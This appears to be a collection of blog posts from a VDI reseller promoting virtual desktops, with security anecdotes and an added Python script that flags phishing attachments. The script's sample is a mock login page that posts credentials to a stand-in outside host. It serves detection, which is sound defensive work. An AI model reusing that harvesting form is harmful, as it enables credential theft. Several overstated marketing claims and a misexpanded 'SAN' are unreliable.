So what is VDI?

VDI, or Virtual Desktop Infrastructure, represents the future of company and institutional networks, and reflects the IT department’s need to control, manage and reduce the operating expenses of running data networks. Simply put, it replaces the standard desktop PC model, a physical PC on every desk, with a small box that transfers the work from the traditional, support-intensive PC to the server room or data center.

Why? Because it takes an enormous effort to support each computer on users’ desks, so VDI moves that experience from software running on those desktop PCs to the data center. It’s clean, simple and inexpensive. This graphic clearly shows the advantages.

If done properly, the users don’t know that their PCs have moved; it just works after a normal login and the users continue to use their desktop peripherals as normal. The desktop PCs are replaced with zero or thin clients called endpoints, or even repurposed older XP PCs, all of which allow the user to use the “PC” located elsewhere. The normally loafing super servers in the data center now have something to do all the time, so the IT managers finally get their money’s worth out of these machines.

The biggest requirements in today’s IT Network infrastructure are to:

  • Cut hardware costs
  • Reduce administration
  • Reduce energy consumption
  • Improve security

Watch this video from one of our vendors. We generally recommend VMware, Citrix Xen, Parallels Virtuozzo or a Linux foundation to VDI. This 4 minute clip will help you understand VDI.

Another video illustrating the power of VDI -

From Wow to How – Watch this and be amazed!


You’ve been hacked!

Yes, it’s true. It’s almost 100% certain that a hacker or two has got past all of your sophisticated firewalls, AV screening systems and whatever intrusion systems you have and is poking around your corporate network.

Let’s start with a story from the Trojan wars, aptly named in this instance. About 3,000 years ago, according to Greek mythology, the Greeks waged a fruitless war against the Trojans, who used boiling oil, bows and arrows and so on (their firewalls and AV systems) to stop the Greek intruders, who tried without success to break down the walls of Troy. Finally the Greeks built a wooden horse, secreted 30 men inside and left it outside the gates of Troy. The Greeks pretended to sail away, and the Trojans towed the horse into the city as a victory homage.

You know the rest of the story. The Greeks left the horse at night, opened the gates and the Greeks took Troy.

That’s also what happened to your network. Your Trojan horses are the laptop users who take their notebooks home and to coffee shops and hotels. They work on them, become infected and then take the Trojan horses back to work. Once inside the heavily protected walls of your outer defenses, the malware starts infecting everything… and you probably have no idea what’s going on.

The solution, other than doing regular sweeps of your entire network, which won’t catch everything, is to use VDI.

As the users of VDI know, XP or Windows 7 is displayed in a browser window and isn’t on the host PC or laptop. The actual operating systems and applications never leave your fortress, so nothing gets in. Laptop users can still use their “office PC”, except it’s through their browser. It’s a similar concept to using Gmail. You can write and read emails on it through your browser, but you don’t own or control the software. It resides on Google’s servers, so you can’t hack the underlying software.

It’s simple and it works.

Here’s an example of how it’s done – http://searchsecurity.techtarget.com/news/1280089728/Russian-cybercriminal-steals-32M-from-US-government-with-Zeus-SpyEye-toolkit

 

 


Guilty as charged!

I have to laugh. Just after writing my You’ve been hacked post, I actually fell for a phishing email a few days after I wrote it! Here’s the story…

We were thinking of changing our credit card processor and coincidentally I received an email from the provider asking for me to renew the yearly credit card agreement. I thought it would be good time to review the terms, so I got the user name and password and typed the credit card processing data entry web site into the browser. I looked around for the renewal link and didn’t see it so I logged out.

So far, so good.

For some reason, I committed the cardinal sin. I blindly clicked on the email web attachment which displayed the card processor’s login page again and tried to log in thinking (or really not thinking) that it was an associated site. It failed. I closed the browser and forgot about it… for about 30 seconds when a light-bulb lit up above my head!

I realized that the link was not actually a web link, but a path to the local html page. I realized that I had been phished and quickly went to another PC, logged in to the processor the correct way and changed the password. When I examined the underlying information in the attachment I found that our login credentials had been sent to Spain or wherever!

Fortunately I caught it immediately, and as very little information was viewable on the credit card website they couldn’t do much with the information unless it was a part of a bigger scheme.

So I was caught, after years of not trusting any web login page especially when it was supplied by email. I must have been asleep for a moment. That’s all it takes to compromise an entire network.

My PC was a VDI virtualized instance, so I could either roll it back to the day before the incident or generate a new copy from a gold instance. The first would take a few minutes, or I could just blow it away and use the second method to generate a brand new Windows 7 instance in five.

I picked the five minute method. We run Unidesk middleware that separates the operating system from the applications and personalization. It’s something like a layer cake; we could remove the Windows 7 layer only, and slide in a new gold version. The applications and personalization stay the same.

In ten minutes my PC was back to the way it was, without any chance that the error I made had also accidentally installed Trojans or viruses, or had other serious consequences, in addition to getting our password.

Can you do that without a VDI network? I doubt it. Not a chance.

You have been warned, and your business network has almost certainly been hacked. They are stealing from you.
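The check described in the post above, examining where the attachment's login form actually sends the credentials, can be automated. This is an added example, not part of the original post; the host names, the `audit_attachment` helper and the sample attachment are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAuditor(HTMLParser):
    """Collect each <form>'s action/method and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": (a.get("action") or "").strip(),
                             "method": (a.get("method") or "get").lower(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_trusted(host, trusted_hosts):
    # Exact match or a true subdomain; "trusted.example.evil.test" does not pass.
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def audit_attachment(html_text, trusted_hosts):
    """Return one finding per credential form that does not post to a trusted host."""
    parser = FormAuditor()
    parser.feed(html_text)
    parser.close()
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue  # only forms that collect a password are of interest
        url = urlparse(form["action"])
        host = (url.hostname or "").lower()
        reasons = []
        if not host:
            reasons.append("no absolute action URL, destination unknown")
        elif not is_trusted(host, trusted_hosts):
            reasons.append("credentials post to untrusted host " + host)
        if url.scheme == "http":
            reasons.append("submitted over plain http")
        if reasons:
            findings.append({"host": host, "action": form["action"],
                             "reasons": reasons})
    return findings


# Constructed sample: a saved "login page" attachment that borrows the real
# site's logo but posts the credentials somewhere else.
SAMPLE_ATTACHMENT = """
<html><body>
<img src="https://cardprocessor.example/logo.png">
<form method="POST" action="http://collector.example.net/save.php">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Log in">
</form>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_attachment(SAMPLE_ATTACHMENT, {"cardprocessor.example"}):
        print(f["action"], "->", "; ".join(f["reasons"]))
```

A form submitted by script rather than by its `action` attribute is not covered by this static check, so a clean result is not proof that an attachment is safe.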


Who’s the top dog?

We work with a variety of VDI solutions – VMware View, Citrix XenDesktop, Quest vWorkspace, Pano Logic, 2X, Kaviza VDI-in-a-Box, Virtual Bridges VERDE, Red Hat Enterprise Virtualization for Desktops (RHEV) and others. We get the question all of the time… who’s the top gun in this category?

It depends… like everything else in life. That question can be answered based on price/performance, performance alone (depending on what’s meant by “performance”), the most robust experience, equipment in your data center, if you want a commercial data center to host it and many more.

Let’s focus on performance, dictated in large part by the protocol used to move bytes around between the data center and the endpoint. If we only include the VDI endpoints that use a browser for the user to work in, either on a PC, Mac, thin client or whatever, then here’s the list based on our experience -

Top position – HDX, used by Citrix and Kaviza
Middle position – VMware View (PCoIP) and RedHat (developer SPICE), VERDE (open source SPICE)
A notch down – Quest (EOP) and 2X, RDP
The worst – none. They all have their pros and cons. Even the venerable RDP protocol works fine.

We have decided to set up a rolling series of demos on a test server in our office. Weeks 1-3 will be HDX, using Kaviza, the next three Red Hat, the following three VERDE, and the final three View. This is not a trivial task, as these builds take a lot of time and effort. But if you see VDI in action, you’ll become a believer.

We cannot demo Pano Logic as their elegant solution depends on a hardware endpoint, but the others will work fine in a browser. We don’t want to demo Quest as it’s an immensely complex and delicate product. We like robust. I like to keep what hair I have left.

We can only entertain providing the DNS and user accounts to metro Atlanta prospective customers because -

1   We get so many hits on this website that our test server will grind to a halt as it’s only configured for twenty users at the same time, not a thousand.

2   We only have a 5Mbps uplink so we must restrict the number of active users.

3   We are a commercial business, so it’s a good way for us to prospect for Georgia business.

If you are a business (not a competitor) in Georgia interested in VDI, please email from your business account to us at vdidemo@atlantavdi.com and we’ll put you on the list.


How many times have you watched the news and seen a disaster unfolding with fire trucks, police cars and ambulances? Lots, right? And how many times have you seen a trailer towed to the scene so that the coordinators can provide onsite logistics to coordinate all of the emergency services? Never… you’re right again, but it will change.

It will change as Sprint has introduced its mobile convergence technology and we provide equipment to make use of it. Here’s how it works.

In a nutshell, Sprint installs mobile 4G using a directional antenna that’s pointed with a clear line of sight to one of their towers. A portable generator powers everything, including heat or A/C, so that the Sprint system provides a stable, very high speed Internet connection to the trailer. Inside the trailer will be thin or zero client workstations attached to a single server that emulates PCs for every user. Next to each client will be a keyboard, monitor, mouse and a VoIP (Voice over IP) telephone, served by a simple virtualized phone system application (running in that single server) with auto-attendant, voice mail, call recording and every feature that a regular office would have.

The result… a preconfigured highly efficient “in the field” office in a box trailer, one that emergency services can use to save lives and coordinate emergency response at the scene and not from a remote location.


Libraries with Internet accessible computer networks are in an awkward position – they have to provide Internet access but must make sure that certain sites are blocked. The problem is that blocking them takes time and effort, and slip-ups occur. One of the remarkable fringe benefits of VDI and the required server running in the corner is that a firewall virtual appliance is both easy to install and self maintaining!

Let me describe how this works. As I’ve written before, VMware, Citrix XenServer and Microsoft’s Hyper-V all boot the server and create a volume or volumes where servers can be installed within the “host” or server. Those servers can be converted from a single physical server, converted from another virtualized system (such as moving from XenServer to VMware ESX) or installed as an appliance. Appliance? What’s that?

An appliance is simply a complete server that was created by someone else, saved to a shared pool of appliances, and that may be downloaded directly into the virtualized server for instant use. For example, Zimbra, formerly a Yahoo.com product and a competitor of Microsoft Exchange, was sold to VMware and virtualized into an appliance. So if you have ten minutes to spare you can select and download the Zimbra appliance (http://www.zimbra.com/) and have a running messaging server minutes thereafter! To reiterate, an appliance is (usually) a Linux file server software release such as CentOS 5 that has a piece of software such as Zimbra pre-installed on it. It saves a great deal of time installing a server, and then the specialized software on top of it. So what does this have to do with libraries?

Lots… as I said, they have to screen material electronically before the content gets to the endpoint – the library computer user. The quickest and best way to do this is to install a gateway or filtering appliance such as Untangle (http://wiki.untangle.com/index.php/Untangle_Virtual_Appliance_on_VMware) or Astaro (http://www.astaro.com/products/astaro-security-gateway-software-appliance), both excellent products. In a matter of minutes, either can be installed and activated. Not only that, but they use the Internet to update themselves every day automatically. Time and effort are money. It’s best to save time and money by installing an appliance and letting it do the work itself.


How would you like?

How would you like to make your IT life easier? How would you like to be able to deploy specific applications to individuals, groups and any combination for up to 10,000 desktops with just a few clicks? And how about being able to remove some of those, or all, apps with a single click?

How would you like to not have to build dozens of gold images, each with a specific application set? But, instead build one, and add the application layers later?

Watch this space. Coming soon…

The Boy Scouts’ motto is “Be Prepared.” The Federal Emergency Management Agency’s (FEMA) motto is similar: to prepare for disaster before it happens and stockpile whatever’s necessary to deal with the disaster, quickly and as efficiently as possible. So how does VDI fit into this picture?

Nowadays, it’s vital for FEMA or any organization that has to deal with the unexpected. One of the core methodologies is organization, and the key to providing organization and detailed follow-through is using computers. The problem FEMA has is moving personnel to a location and getting them up and running, working efficiently to deal with a disaster. That can take days, or even weeks. Enter Sprint 4G and VDI. Here’s how it works…

As you know, it’s fairly easy to establish a “network in a box,” a complete network of 20-100 Zero Client “end-points,” the desktop computer if you will, using a central server with master Windows XP or Windows 7 images that can be updated quickly with the latest software revisions or applications most useful to that disaster. And the new data convergence technology that Sprint (one of our business partners) has provides reliable 4G voice and data networks using a roof mounted parabolic antenna.

So if they stock trailers with foldup desks built into the trailer walls, each with a Zero Client device and a Voice over IP, VoIP (http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol) telephone, a virtual server in the corner with a generator ready to supply power for the network and A/C, and finally a roof mounted antenna, you have a complete, secure voice and data mobile office. Just tow, or fly smaller versions of, these trailers into the disaster area and the FEMA specialists will have instant phone and data networks to work on the problem… fast.

This can provide FEMA and similar organizations an efficient way to service a disaster or similar area and keep its employees working at peak efficiency.


It depends. Do you recall the soft drink commercials that somehow attempted to persuade us that zero calories made a significant difference from one calorie drinks? Well, it’s not as meaningless as that, but Zero and Thin do provide some interesting comparisons to the big, old fat client of yesteryear. Let’s define the terms, without getting too technical.

The fat client is the standard PC or laptop. The operating system, applications and everything else are inside the single box, sitting on the employee’s desk.

The thin client category covers a whole range of products, but generally they are small boxes designed to replace the desktop PC by slimming down what is included in the box. Usually there is no hard drive, just a simplified operating system, a BIOS, CPU, RAM and firmware to make it all work.

The idea is that the thin client uses the server to provide the desktop and application services that normally would take place on the PC and just shows the results. Depending on the types of applications used at that desk, they can be close to fat clients if they need to run applications such as CAD, PhotoShop or movie editing software, down to very skinny thin clients that have very little in them except a graphics adapter processor to show full screen YouTube or similar videos in addition to regular work.

On the other end of the spectrum, there is only one real Zero Client product, made by Pano Logic. Their cubes do not have a CPU, RAM, firmware or any of what makes the cubes a “PC.” They use a unique technology that actually produces an amazingly good experience for the end user and are very easy to manage.

It depends on what you want to accomplish. As you know, there are lots of PC manufacturers, but in the thin client market Wyse is the largest and best known player. It has a wide array of products, including what they offer as a Zero Client. Is it? Not quite, but close. As described above, only Pano Logic offers a true zero client.


No pain, no gain

When considering VDI there are five main pain points that company management has to deal with. I call them pain points, as management winces when they think about this stuff.

  • Electricity – VDI solves the high power bill problem. You can run 50 VDI desktop devices for the same electricity use as 1 PC. Result, thousands of dollars a month saved in both electricity use and A/C savings.
  • Management – Desktop PCs need lots of TLC. And TLC needs time and money. VDI devices need next to no maintenance.  Result, thousands of dollars a month saved in IT labor or consultant costs.
  • Security – Desktop PCs are easily compromised, stolen or used for inappropriate activities. VDI devices can be easily locked down. Result, no lawsuits for company confidential information getting out.
  • Viruses – Individual users like to install software and visit websites that infect not only their PC, but everyone else’s. It’s a constant cat and mouse challenge for IT management. VDI devices end the problem. If an instance of XP or Windows 7 is infected an entire new suite of “gold copy” Windows XP or Windows 7 software can be rolled out automatically overnight. As all user data is stored in a data storage device, only the operating system is recreated with the latest patches and A/V software… virus free. Result – dramatic reduction in IT maintenance work, updating each machine.
  • Usability – Desktop PC operating system changes need user training so that users know what to do when the changeover occurs. VDI devices allow both XP and Windows 7 to be available on the same devices. Result – training is a gradual process so users can get used to the new Windows 7 without being traumatized by a single day switch over with weeks of expensive training.

When management thinks through how their current infrastructure addresses these points, compared to how well VDI handles them, they will think long and hard about evaluating VDI to see if these five points are easily dealt with by using VDI. It does, and it will.


Yes, it does matter, but which one is best is dependent on the size of the network and on how many physical servers, or hosts as they tend to be called today, you have.

The simplest external storage is DAS, Direct Attached Storage. If you’re using external SATA drives, or eSATA (the same drives you may use internally, but kept outside of the physical server) this is a type of DAS. A DAS is when you have an external hard drive or two and a cable running into the server attached to one of the eSATA connectors.

The NAS is Network Attached Storage. The storage device is attached to the network with an Ethernet jack and typically accessed by a single server. A NAS is a single storage device that uses its own file system so a user can browse the NAS for files. Simply put, they are single purpose computers that users attach to, such as by assigning a drive letter, which do nothing but provide access to stored data. It’s like a giant storage drive separate from the servers. Compared to a SAN, a NAS is for lighter loads.

The SAN, on the other hand, is a Storage Attached Network. It usually consists of a group of storage devices that work together and is designed to be used by multiple servers under heavy load. They have a high speed link (either fibre or iSCSI with very fast adapters) to those servers so data can be shared across the servers. That’s not to say that NAS isn’t similar; it is, but SAN devices tend to be faster, better suited to being shared by multiple computers and, of course, more expensive.

In essence, a SAN is a storage device on the network that operates using disk blocks. This type of storage device appears to the users (via iSCSI, the most popular, or a similar protocol) as a location on the file server where their data is stored, but is actually elsewhere on the network. If you have many servers that share data, use a SAN; if just one, use a NAS.

The cobbler’s children

As you know, the fable about the cobbler’s children is that the cobbler spent so much time repairing his customers’ shoes that he didn’t have the time, or the inclination, to provide them to his own children. So goes the Oak Ridge National Laboratory in Tennessee.

This federal facility, tasked with teaching other federal locations how to avoid being hacked, was… you guessed it, hacked. You can read about it here. Ignoring just how much public money is spent on our federal security façade, it lends a thought to securing your own network. There are many ways to protect your users from cyber attacks – anti-virus applications, anti-spam programs, gateway security appliances, ongoing education about what not to click, why not to plug your USB stick into your office computer and so on.

But the real trick is layered security, a mix of all the above methods layered in such a way to create an electronic maze. A maze is usually described as a physical location that has passages leading to many dead ends, with only one passage leading to the exit on the other side. The plan is to navigate the maze so you find the one route to the exit without travelling a passage leading to a dead-end. The best example I can think of is the one at Hampton Court in England.

And like a maze, layering a variety of anti-malware dead-ends that a virus, Trojans, spam or other malware has to navigate is the best method to stop the end-user, and your company from having its data stolen. And if you think it won’t happen to you, look at the current story about Sony being hacked and having 70 million IDs stolen.

It can, and it likely will.

So how does VDI help? It’s easy. The Oak Ridge National Laboratory has many, many computers. And it only took one for the infection to take hold, which it did, as that particular computer wasn’t quite up to date, so the malware’s blind attempt to infect the PC worked. With VDI, a single image is carefully built, scanned, updated and made as anti-malware as possible and rolled out to all the users automatically. A thousand or more PCs is easy. And updates are easily applied to all users with a click of a button, not a thousand clicks and many, many desktop visits. IT no longer has to update a thousand PCs, which is an almost impossible task, but only one image.

You want to stop malware in its tracks, think VDI.


Are you a candidate for green computing?

You may think that your company is well suited to VDI and green computing. Take this survey and we’ll let you know.

How many PCs does your company have?

How many employees do you need to support your network?
